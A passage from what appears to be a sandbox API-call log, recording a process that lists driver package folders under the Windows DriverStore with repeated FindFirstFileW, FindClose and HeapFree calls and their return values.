ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65d2e92d, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65d2e92d, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd08 [0030.866] FindClose (in: hFindFile=0x70fd08 | out: hFindFile=0x70fd08) returned 1 [0030.866] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.867] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\angelu64.inf_amd64_neutral_3d6079dd78127f5e\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x46784911, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65d54a8d, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65d54a8d, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd08 [0030.867] FindClose (in: hFindFile=0x70fd08 | out: hFindFile=0x70fd08) returned 1 [0030.867] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.867] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\arc.inf_amd64_neutral_11b52dec8e94d9aa\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x423f9854, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61ce96b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61ce96b6, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd08 [0030.868] FindClose (in: hFindFile=0x70fd08 | out: hFindFile=0x70fd08) returned 1 [0030.868] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.868] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\arcsas.inf_amd64_neutral_c763887719bed95d\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x424b7f36, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61d0f817, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61d0f817, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd08 [0030.868] FindClose (in: hFindFile=0x70fd08 | out: hFindFile=0x70fd08) returned 1 [0030.868] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.868] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\atiilhag.inf_amd64_neutral_0a660e899f5038a2\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x37d8b42c, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3b8e793a, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3b8e793a, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd08 [0030.870] FindClose (in: hFindFile=0x70fd08 | out: hFindFile=0x70fd08) returned 1 [0030.871] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.871] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\atiriol6.inf_amd64_neutral_bde34ad5722cca75\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x459d4a78, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x659c2986, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x659c2986, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd08 [0030.871] FindClose (in: hFindFile=0x70fd08 | out: hFindFile=0x70fd08) returned 1 [0030.871] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.871] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\avc.inf_amd64_neutral_3ef33c750e6308ce\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ebbd02d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60b352f6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60b352f6, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd08 [0030.872] FindClose (in: hFindFile=0x70fd08 | out: hFindFile=0x70fd08) returned 1 [0030.872] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.872] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\averfx2hbh826d_noaverir_x64.inf_amd64_neutral_da2ba9e8a30dad14\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45a6cff9, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x659e8ae7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x659e8ae7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd08 [0030.874] FindClose (in: hFindFile=0x70fd08 | out: hFindFile=0x70fd08) returned 1 [0030.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.874] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\averfx2hbtv_x64.inf_amd64_neutral_7216b6fb23536c40\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45b2b6da, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65a34da7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65a34da7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd08 [0030.876] FindClose (in: hFindFile=0x70fd08 | out: hFindFile=0x70fd08) returned 1 [0030.877] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.880] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\averfx2swtv_noavin_x64.inf_amd64_neutral_86943dd17860e449\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45c0ff1c, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65a5af08, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65a5af08, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd08 [0030.882] FindClose (in: hFindFile=0x70fd08 | out: hFindFile=0x70fd08) returned 1 [0030.883] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.883] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\averfx2swtv_x64.inf_amd64_neutral_24a71cdaabc7f783\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45d66b7e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65aa71c8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65aa71c8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd08 [0030.884] FindClose (in: hFindFile=0x70fd08 | out: hFindFile=0x70fd08) returned 1 [0030.885] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.885] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\averhbh826_noaverir_x64.inf_amd64_neutral_2fe3b14136d6e46d\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45e25260, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65acd328, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65acd328, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd08 [0030.887] FindClose (in: hFindFile=0x70fd08 | out: hFindFile=0x70fd08) returned 1 [0030.887] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.887] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\avmx64c.inf_amd64_neutral_8ebb15bf548db022\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x398df1b4, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5f66124f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x5f66124f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd08 [0030.889] FindClose (in: hFindFile=0x70fd08 | out: hFindFile=0x70fd08) returned 1 [0030.890] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.890] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\battery.inf_amd64_neutral_cb8fa151a7b7cb80\\*", lpFindFileData=0x71de70 | out: lpFindFileData=0x71de70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43d90504, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6215ffff, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6215ffff, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd08 [0030.892] FindClose (in: hFindFile=0x70fd08 | out: hFindFile=0x70fd08) returned 1 [0030.893] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71de70 | out: hHeap=0x6d0000) returned 1 [0030.893] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\bda.inf_amd64_neutral_41c6262952846788\\*", lpFindFileData=0x71de70 | out: lpFindFileData=0x71de70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d9bc9ac, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x607c934f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x607c934f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd08 [0030.893] FindClose (in: hFindFile=0x70fd08 | out: hFindFile=0x70fd08) returned 1 [0030.893] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71de70 | out: hHeap=0x6d0000) returned 1 [0030.893] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\blbdrive.inf_amd64_neutral_1aa816fe7dc98c3f\\*", lpFindFileData=0x71de70 | out: lpFindFileData=0x71de70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43bc7480, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x62139e9e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x62139e9e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd08 [0030.894] FindClose (in: hFindFile=0x70fd08 | out: hFindFile=0x70fd08) returned 1 [0030.894] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71de70 | out: hHeap=0x6d0000) returned 1 [0030.894] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\brmfcmdm.inf_amd64_neutral_af49d2f3ffa12116\\*", lpFindFileData=0x71de70 | out: lpFindFileData=0x71de70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50dd8b83, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6c4482cb, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6c4482cb, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd08 [0030.895] FindClose (in: hFindFile=0x70fd08 | out: hFindFile=0x70fd08) returned 1 [0030.896] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71de70 | out: hHeap=0x6d0000) returned 1 [0030.896] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\brmfcmf.inf_amd64_neutral_67b5984f8e8ff717\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3af09ebd, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5ffc0901, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x5ffc0901, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd08 [0030.901] FindClose (in: hFindFile=0x70fd08 | out: hFindFile=0x70fd08) returned 1 [0030.901] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.901] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\brmfcsto.inf_amd64_neutral_2d7208355536945e\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40742ec0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x612333a3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x612333a3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.902] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.902] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.902] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\brmfcumd.inf_amd64_neutral_db43b26810939b3e\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x407db441, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61259503, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61259503, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.902] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.902] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.902] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\brmfcwia.inf_amd64_neutral_817b8835aed3d6b7\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b145361, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60058e82, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60058e82, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.905] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.905] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.905] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\brmfport.inf_amd64_neutral_f41f35e5c21bc350\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b2e8284, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6013d6c3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6013d6c3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.907] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.908] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.908] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\bth.inf_amd64_neutral_e54666f6a3e5af91\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x38143693, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3ba3e59c, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3ba3e59c, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.910] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.911] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.911] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\bthmtpenum.inf_amd64_neutral_c70e85b87ee4ece9\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5bd8c4a7, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6d374f27, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6d374f27, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.911] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.911] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.911] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\bthpan.inf_amd64_neutral_024281c0e4e954e2\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d29879f, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x606e4b0e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x606e4b0e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.912] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.912] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.912] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\bthprint.inf_amd64_neutral_3c11362fa327f5a4\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d92442b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x607c934f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x607c934f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.912] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.912] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.912] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\bthspp.inf_amd64_neutral_1b15060bdfbd09e1\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d7f3928, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x607a31ef, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x607a31ef, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.913] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.913] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.913] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\cdrom.inf_amd64_neutral_0b3d0d1942ab684b\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39a67f22, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3c1164e9, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3c1164e9, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.913] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.913] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.913] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\circlass.inf_amd64_neutral_cf52485bed804e02\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d546063, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60756f2f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60756f2f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.914] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.914] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.914] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\compositebus.inf_amd64_neutral_b9280780a8000d4b\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3766721f, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3b686335, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3b686335, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.914] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.914] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.914] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\cpu.inf_amd64_neutral_ae5de2e1bf2793c3\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42df1487, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61f4acbb, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61f4acbb, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.915] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.916] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.917] FindFirstFileW (in: 